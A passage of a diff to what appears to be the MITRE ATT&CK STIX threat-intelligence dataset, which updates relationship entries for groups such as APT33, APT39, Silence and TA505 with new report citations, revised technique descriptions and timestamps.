- "description": "[APT33](https://attack.mitre.org/groups/G0064) has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250). (Citation: Symantec Elfin Mar 2019)",
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250), and attempted to gain remote code execution via a security bypass vulnerability (CVE-2017-11774).(Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)",
"relationship_type": "uses",
"id": "relationship--e948752d-c4a1-4678-97e4-2bd11563115e",
"type": "relationship",
- "modified": "2019-06-28T15:05:33.153Z",
+ "modified": "2020-06-22T20:15:32.360Z",
"created": "2019-04-10T15:21:29.417Z"
},
{
@@ -126043,27 +127247,6 @@
"modified": "2019-06-28T15:05:33.935Z",
"created": "2019-04-10T15:21:29.533Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
- "target_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
- "external_references": [
- {
- "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.",
- "url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "source_name": "Symantec Elfin Mar 2019"
- }
- ],
- "description": "(Citation: Symantec Elfin Mar 2019)",
- "relationship_type": "uses",
- "id": "relationship--4aa63758-5271-471e-8276-909c72f0f70e",
- "type": "relationship",
- "modified": "2019-06-28T15:05:33.938Z",
- "created": "2019-04-10T15:21:29.535Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -126183,16 +127366,21 @@
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"external_references": [
{
- "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.",
+ "source_name": "Symantec Elfin Mar 2019",
"url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "source_name": "Symantec Elfin Mar 2019"
+ "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019."
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
}
],
- "description": "[APT33](https://attack.mitre.org/groups/G0064) has downloaded additional files and programs from its C2 server.(Citation: Symantec Elfin Mar 2019)\t\n",
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has downloaded additional files and programs from its C2 server.(Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)\t\n",
"relationship_type": "uses",
"id": "relationship--a06ada98-605a-47c5-9362-41e86c2ada6e",
"type": "relationship",
- "modified": "2019-06-28T15:05:33.412Z",
+ "modified": "2020-06-22T20:15:32.333Z",
"created": "2019-04-10T16:09:07.893Z"
},
{
@@ -126204,16 +127392,21 @@
"target_ref": "attack-pattern--970a3432-3237-47ad-bcca-7d8cbb217736",
"external_references": [
{
- "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.",
+ "source_name": "Symantec Elfin Mar 2019",
"url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "source_name": "Symantec Elfin Mar 2019"
+ "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019."
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
}
],
- "description": "[APT33](https://attack.mitre.org/groups/G0064) has utilized PowerShell to download files from the C2 server and run various scripts. (Citation: Symantec Elfin Mar 2019)",
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has utilized PowerShell to download files from the C2 server and run various scripts. (Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)",
"relationship_type": "uses",
"id": "relationship--cd69ba48-b716-4278-b1a0-2efd3bd2d4de",
"type": "relationship",
- "modified": "2019-06-28T15:05:33.402Z",
+ "modified": "2020-06-22T20:15:32.389Z",
"created": "2019-04-10T16:09:07.895Z"
},
{
@@ -126343,16 +127536,21 @@
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"external_references": [
{
- "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019.",
+ "source_name": "Symantec Elfin Mar 2019",
"url": "https://www.symantec.com/blogs/threat-intelligence/elfin-apt33-espionage",
- "source_name": "Symantec Elfin Mar 2019"
+ "description": "Security Response attack Investigation Team. (2019, March 27). Elfin: Relentless Espionage Group Targets Multiple Organizations in Saudi Arabia and U.S.. Retrieved April 10, 2019."
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
}
],
- "description": "[APT33](https://attack.mitre.org/groups/G0064) has deployed a tool known as DarkComet to the Startup folder of a victim.(Citation: Symantec Elfin Mar 2019)",
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has deployed a tool known as [DarkComet](https://attack.mitre.org/software/S0334) to the Startup folder of a victim, and used Registry run keys to gain persistence.(Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)",
"relationship_type": "uses",
"id": "relationship--d15c3d84-9e21-41ac-9728-f97183b63ec6",
"type": "relationship",
- "modified": "2019-06-28T15:05:33.560Z",
+ "modified": "2020-06-30T22:07:31.581Z",
"created": "2019-04-12T15:39:21.975Z"
},
{
@@ -127476,27 +128674,6 @@
"modified": "2019-06-28T15:05:33.554Z",
"created": "2019-04-17T13:23:24.206Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
- "target_ref": "attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e",
- "external_references": [
- {
- "source_name": "FireEye APT33 Guardrail",
- "url": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "description": "Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019."
- }
- ],
- "description": "[APT33](https://attack.mitre.org/groups/G0064) has used port 443 for command and control.(Citation: FireEye APT33 Guardrail)",
- "relationship_type": "uses",
- "id": "relationship--a7465f73-03b9-4cbb-91fc-4f7afb99553a",
- "type": "relationship",
- "modified": "2019-06-28T15:05:33.404Z",
- "created": "2019-04-17T13:23:24.216Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -127530,13 +128707,18 @@
"source_name": "FireEye APT33 Guardrail",
"url": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
"description": "Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019."
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
}
],
- "description": "(Citation: FireEye APT33 Guardrail)",
+ "description": "(Citation: FireEye APT33 Guardrail)(Citation: Microsoft Holmium June 2020)",
"relationship_type": "uses",
"id": "relationship--6ea02c5b-f60b-4774-a237-fcc3f498a4f5",
"type": "relationship",
- "modified": "2019-06-28T15:05:34.037Z",
+ "modified": "2020-06-22T20:15:37.597Z",
"created": "2019-04-17T13:30:22.934Z"
},
{
@@ -127713,7 +128895,7 @@
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"source_ref": "malware--edb24a93-1f7a-4bbf-a738-1397a14662c6",
- "target_ref": "attack-pattern--7385dfaf-6886-4229-9ecd-6fd678040830",
+ "target_ref": "attack-pattern--0f4a0c76-ab2d-4cb0-85d3-3f0efb8cba0d",
"external_references": [
{
"description": "Doaty, J., Garrett, P.. (2018, September 10). We\u2019re Seeing a Resurgence of the Demonic Astaroth WMIC Trojan. Retrieved April 17, 2019.",
@@ -127725,7 +128907,7 @@
"relationship_type": "uses",
"id": "relationship--71ec5140-320c-452c-8512-6a787af027c8",
"type": "relationship",
- "modified": "2020-03-17T19:02:05.654Z",
+ "modified": "2020-06-23T19:38:55.293Z",
"created": "2019-04-17T13:46:38.805Z"
},
{
@@ -129067,36 +130249,20 @@
"source_name": "FireEye APT33 Guardrail",
"url": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
"description": "Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019."
+ },
+ {
+ "source_name": "Microsoft Holmium June 2020",
+ "url": "https://www.microsoft.com/security/blog/2020/06/18/inside-microsoft-threat-protection-mapping-attack-chains-from-cloud-to-endpoint/",
+ "description": "Microsoft Threat Protection Intelligence Team. (2020, June 18). Inside Microsoft Threat Protection: Mapping attack chains from cloud to endpoint. Retrieved June 22, 2020."
}
],
- "description": "[APT33](https://attack.mitre.org/groups/G0064) has used password spraying to gain access to target systems.(Citation: FireEye APT33 Guardrail)",
+ "description": "[APT33](https://attack.mitre.org/groups/G0064) has used password spraying to gain access to target systems.(Citation: FireEye APT33 Guardrail)(Citation: Microsoft Holmium June 2020)",
"relationship_type": "uses",
"id": "relationship--8b5691c7-1815-4d76-a7dd-dfd827043bb9",
"type": "relationship",
- "modified": "2020-03-11T17:08:34.088Z",
+ "modified": "2020-06-22T20:15:32.352Z",
"created": "2019-04-18T14:44:18.146Z"
},
- {
- "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "object_marking_refs": [
- "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
- ],
- "source_ref": "intrusion-set--fbd29c89-18ba-4c2d-b792-51c0adee049f",
- "target_ref": "attack-pattern--853c4192-4311-43e1-bfbb-b11b14911852",
- "external_references": [
- {
- "source_name": "FireEye APT33 Guardrail",
- "url": "https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html",
- "description": "Ackerman, G., et al. (2018, December 21). OVERRULED: Containing a Potentially Destructive Adversary. Retrieved January 17, 2019."
- }
- ],
- "description": "[APT33](https://attack.mitre.org/groups/G0064) has used kill dates in their malware to guardrail execution.(Citation: FireEye APT33 Guardrail)",
- "relationship_type": "uses",
- "id": "relationship--60df992b-7728-4736-b7bb-98d4578460f8",
- "type": "relationship",
- "modified": "2019-06-28T15:05:33.690Z",
- "created": "2019-04-18T14:44:18.163Z"
- },
{
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
"object_marking_refs": [
@@ -129970,7 +131136,7 @@
"relationship_type": "mitigates",
"id": "relationship--baa9ac7d-b1fd-4e31-b08a-58c84b39153e",
"type": "relationship",
- "modified": "2019-07-24T19:41:59.067Z",
+ "modified": "2020-07-14T19:33:52.635Z",
"created": "2019-04-22T13:54:51.514Z"
},
{
@@ -131136,13 +132302,18 @@
"source_name": "FireEye APT39 Jan 2019",
"url": "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html",
"description": "Hawley et al. (2019, January 29). APT39: An Iranian Cyber Espionage Group Focused on Personal Information. Retrieved February 19, 2019."
+ },
+ {
+ "source_name": "BitDefender Chafer May 2020",
+ "url": "https://labs.bitdefender.com/2020/05/iranian-chafer-apt-targeted-air-transportation-and-government-in-kuwait-and-saudi-arabia/",
+ "description": "Rusu, B. (2020, May 21). Iranian Chafer APT Targeted Air Transportation and Government in Kuwait and Saudi Arabia. Retrieved May 22, 2020."
}
],
- "description": "[APT39](https://attack.mitre.org/groups/G0087) has repacked a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) to thwart anti-virus detection.(Citation: FireEye APT39 Jan 2019)",
+ "description": "[APT39](https://attack.mitre.org/groups/G0087) has packed tools with UPX, and has repacked a modified version of [Mimikatz](https://attack.mitre.org/software/S0002) to thwart anti-virus detection.(Citation: FireEye APT39 Jan 2019)(Citation: BitDefender Chafer May 2020)",
"relationship_type": "uses",
"id": "relationship--4bc2e50e-0753-497f-9ec0-af270abe2af1",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.712Z",
+ "modified": "2020-05-29T14:02:52.610Z",
"created": "2019-04-23T18:08:46.205Z"
},
{
@@ -131401,13 +132572,18 @@
"url": "https://blog.talosintelligence.com/2018/01/korea-in-crosshairs.html",
"description": "Mercer, W., Rascagneres, P. (2018, January 16). Korea In The Crosshairs. Retrieved May 21, 2018.",
"source_name": "Talos Group123"
+ },
+ {
+ "source_name": "NCCGroup RokRat Nov 2018",
+ "url": "https://www.nccgroup.com/uk/about-us/newsroom-and-events/blogs/2018/november/rokrat-analysis/",
+ "description": "Pantazopoulos, N.. (2018, November 8). RokRat Analysis. Retrieved May 21, 2020."
}
],
- "description": "[ROKRAT](https://attack.mitre.org/software/S0240) checks for sandboxing libraries.(Citation: Talos Group123)",
+ "description": "[ROKRAT](https://attack.mitre.org/software/S0240) checks for sandboxing libraries.(Citation: Talos Group123)(Citation: NCCGroup RokRat Nov 2018)",
"relationship_type": "uses",
"id": "relationship--8bbe5f67-f65e-4982-8897-7f7466fc0845",
"type": "relationship",
- "modified": "2020-03-16T18:28:51.721Z",
+ "modified": "2020-05-21T17:07:02.805Z",
"created": "2019-04-24T13:44:02.099Z"
},
{
@@ -131501,7 +132677,7 @@
"relationship_type": "mitigates",
"id": "relationship--50818065-cda9-4fe5-ae74-983bb3e436ba",
"type": "relationship",
- "modified": "2019-10-08T19:54:56.050Z",
+ "modified": "2020-07-14T19:29:17.714Z",
"created": "2019-04-24T16:59:33.716Z"
},
{
@@ -131514,7 +132690,7 @@
"relationship_type": "mitigates",
"id": "relationship--6b392dbc-1f55-4eeb-90b5-3f980a01f11d",
"type": "relationship",
- "modified": "2019-07-25T11:42:52.305Z",
+ "modified": "2020-07-14T19:34:47.765Z",
"created": "2019-04-24T17:01:10.541Z"
},
{
@@ -132101,7 +133277,7 @@
"relationship_type": "mitigates",
"id": "relationship--dfd5d379-9af4-4234-a0b2-a1591197249c",
"type": "relationship",
- "modified": "2019-07-24T19:31:37.125Z",
+ "modified": "2020-07-14T19:31:46.707Z",
"created": "2019-04-26T19:30:33.727Z"
},
{
@@ -132163,13 +133339,18 @@
"description": "Legezo, D. (2019, January 30). Chafer used Remexi malware to spy on Iran-based foreign diplomatic entities. Retrieved April 17, 2019.",
"url": "https://securelist.com/chafer-used-remexi-malware/89538/",
"source_name": "Securelist Remexi Jan 2019"
+ },
+ {
+ "source_name": "Symantec Chafer February 2018",
+ "url": "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/chafer-latest-attacks-reveal-heightened-ambitions",
+ "description": "Symantec. (2018, February 28). Chafer: Latest Attacks Reveal Heightened Ambitions. Retrieved May 22, 2020."
}
],
- "description": "(Citation: Symantec Chafer Dec 2015)(Citation: Securelist Remexi Jan 2019)",
+ "description": "(Citation: Symantec Chafer Dec 2015)(Citation: Securelist Remexi Jan 2019)(Citation: Symantec Chafer February 2018)",
"relationship_type": "uses",
"id": "relationship--2a37ddb3-56ef-4c2d-bec7-d6060eb0215a",
"type": "relationship",
- "modified": "2019-04-29T18:16:38.854Z",
+ "modified": "2020-05-22T19:37:14.601Z",
"created": "2019-04-29T15:54:23.241Z"
},
{
@@ -133291,13 +134472,18 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) has been observed making videos of victims to observe bank employees day to day activities.(Citation: SecureList Silence Nov 2017)",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has been observed making videos of victims to observe bank employees day to day activities.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--5e60c70a-7b2f-45b8-b7d4-80e214acfb2d",
"type": "relationship",
- "modified": "2019-07-16T16:12:09.181Z",
+ "modified": "2020-05-06T03:12:02.273Z",
"created": "2019-05-24T17:57:36.608Z"
},
{
@@ -133312,13 +134498,18 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) can capture victim screen activity.(Citation: SecureList Silence Nov 2017)\t",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) can capture victim screen activity.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--778765e1-7eb6-46b1-a370-6dfe09081ee3",
"type": "relationship",
- "modified": "2019-07-16T16:12:09.232Z",
+ "modified": "2020-05-06T03:12:02.277Z",
"created": "2019-05-24T17:57:36.629Z"
},
{
@@ -133333,13 +134524,18 @@
"description": "Skulkin, O.. (2019, January 20). Silence: Dissecting Malicious CHM Files and Performing Forensic Analysis. Retrieved May 24, 2019.",
"url": "https://cyberforensicator.com/2019/01/20/silence-dissecting-malicious-chm-files-and-performing-forensic-analysis/",
"source_name": "Cyber Forensicator Silence Jan 2019"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) deleted scheduled task files after its execution.(Citation: Cyber Forensicator Silence Jan 2019)\t",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has deleted artifacts, including scheduled tasks, communicates files from the C2 and other logs.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: Group IB Silence Sept 2018)\t",
"relationship_type": "uses",
"id": "relationship--ccd99593-7ff0-4706-aa94-73cc8d237fe8",
"type": "relationship",
- "modified": "2019-07-16T16:12:09.229Z",
+ "modified": "2020-05-06T03:19:33.693Z",
"created": "2019-05-24T17:57:36.633Z"
},
{
@@ -133375,13 +134571,18 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) leverages the Windows API to perform a variety of tasks.(Citation: SecureList Silence Nov 2017)\t",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has leveraged the Windows API, including using CreateProcess() or ShellExecute(), to perform a variety of tasks.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--fdedfad5-5cb7-436a-8522-6df3f6de42b1",
"type": "relationship",
- "modified": "2019-07-16T16:12:09.269Z",
+ "modified": "2020-05-13T19:33:26.609Z",
"created": "2019-05-24T17:57:36.683Z"
},
{
@@ -133401,13 +134602,23 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Aug 2019",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_2.0.going_global.pdf",
+ "description": "Group-IB. (2019, August). Silence 2.0: Going Global. Retrieved May 5, 2020."
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) has weaponized CHM files in their phishing campaigns.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has weaponized CHM files in their phishing campaigns.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Aug 2019)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--68602080-9968-4a36-9a5e-130343e61566",
"type": "relationship",
- "modified": "2019-07-16T16:12:09.318Z",
+ "modified": "2020-05-06T03:32:07.265Z",
"created": "2019-05-24T17:57:36.686Z"
},
{
@@ -133427,13 +134638,18 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) attempts to get users to launch malicious attachments delivered via spearphishing emails.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) attempts to get users to launch malicious attachments delivered via spearphishing emails.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--efe23026-7cba-46df-873b-1c8244a92d36",
"type": "relationship",
- "modified": "2020-03-17T14:55:48.484Z",
+ "modified": "2020-05-06T03:12:02.386Z",
"created": "2019-05-24T17:57:36.689Z"
},
{
@@ -133453,13 +134669,18 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) has used Windows command-line to run commands.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used Windows command-line to run commands.(Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--f1eda5c7-6843-406d-89b8-c61759c02450",
"type": "relationship",
- "modified": "2020-03-19T16:21:36.803Z",
+ "modified": "2020-05-06T03:12:02.390Z",
"created": "2019-05-24T17:57:36.696Z"
},
{
@@ -133474,13 +134695,18 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) has used Winexe to install a service on the remote system.(Citation: SecureList Silence Nov 2017)",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has used [Winexe](https://attack.mitre.org/software/S0191) to install a service on the remote system.(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--85be49ac-785e-48af-8d0e-4b74818428fc",
"type": "relationship",
- "modified": "2019-07-16T16:12:09.323Z",
+ "modified": "2020-05-06T03:12:02.433Z",
"created": "2019-05-24T17:57:36.723Z"
},
{
@@ -133542,13 +134768,18 @@
"description": "GReAT. (2017, November 1). Silence \u2013 a new Trojan attacking financial organizations. Retrieved May 24, 2019.",
"url": "https://securelist.com/the-silence/83009/",
"source_name": "SecureList Silence Nov 2017"
+ },
+ {
+ "source_name": "Group IB Silence Sept 2018",
+ "url": "https://www.group-ib.com/resources/threat-research/silence_moving-into-the-darkside.pdf",
+ "description": "Group-IB. (2018, September). Silence: Moving Into the Darkside. Retrieved May 5, 2020."
}
],
- "description": "[Silence](https://attack.mitre.org/groups/G0091) has sent emails with malicious DOCX, CHM and ZIP attachments. (Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017) ",
+ "description": "[Silence](https://attack.mitre.org/groups/G0091) has sent emails with malicious DOCX, CHM, LNK and ZIP attachments. (Citation: Cyber Forensicator Silence Jan 2019)(Citation: SecureList Silence Nov 2017)(Citation: Group IB Silence Sept 2018)",
"relationship_type": "uses",
"id": "relationship--da6a811d-2a77-4f6f-a19e-2aff8662f12f",
"type": "relationship",
- "modified": "2019-07-16T16:12:09.373Z",
+ "modified": "2020-05-06T03:12:02.478Z",
"created": "2019-05-24T17:57:36.733Z"
},
{
@@ -133609,13 +134840,28 @@
"description": "Proofpoint Staff. (2018, March 7). Leaked Ammyy Admin Source Code Turned into Malware. Retrieved May 28, 2019.",
"url": "https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware",
"source_name": "Proofpoint TA505 Mar 2018"
+ },
+ {
+ "source_name": "Trend Micro TA505 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/shifting-tactics-breaking-down-ta505-groups-use-of-html-rats-and-other-techniques-in-latest-campaigns/",
+ "description": "Hiroaki, H. and Lu, L. (2019, June 12). Shifting Tactics: Breaking Down TA505 Group\u2019s Use of HTML, RATs and Other Techniques in Latest Campaigns. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "Proofpoint TA505 October 2019",
+ "url": "https://www.proofpoint.com/us/threat-insight/post/ta505-distributes-new-sdbbot-remote-access-trojan-get2-downloader",
+ "description": "Schwarz, D. et al. (2019, October 16). TA505 Distributes New SDBbot Remote Access Trojan with Get2 Downloader. Retrieved May 29, 2020."
+ },
+ {
+ "source_name": "IBM TA505 April 2020",
+ "url": "https://securityintelligence.com/posts/ta505-continues-to-infect-networks-with-sdbbot-rat/",
+ "description": "Frydrych, M. (2020, April 14). TA505 Continues to Infect Networks With SDBbot RAT. Retrieved May 29, 2020."
}
],
- "description": "[TA505](https://attack.mitre.org/groups/G0092) has used spearphishing emails with malicious attachments to initially compromise victims.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)",
+ "description": "[TA505](https://attack.mitre.org/groups/G0092) has used spearphishing emails with malicious attachments to initially compromise victims.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Proofpoint TA505 Jan 2019)(Citation: Cybereason TA505 April 2019)(Citation: ProofPoint SettingContent-ms July 2018)(Citation: Proofpoint TA505 Mar 2018)(Citation: Trend Micro TA505 June 2019)(Citation: Proofpoint TA505 October 2019)(Citation: IBM TA505 April 2020)",
"relationship_type": "uses",
"id": "relationship--ce962c48-3390-4286-91bb-b38d7fb4f07a",
"type": "relationship",
- "modified": "2019-06-24T19:11:41.200Z",
+ "modified": "2020-06-01T15:46:47.676Z",
"created": "2019-05-28T16:25:35.420Z"
},
{
@@ -133656,13 +134902,23 @@
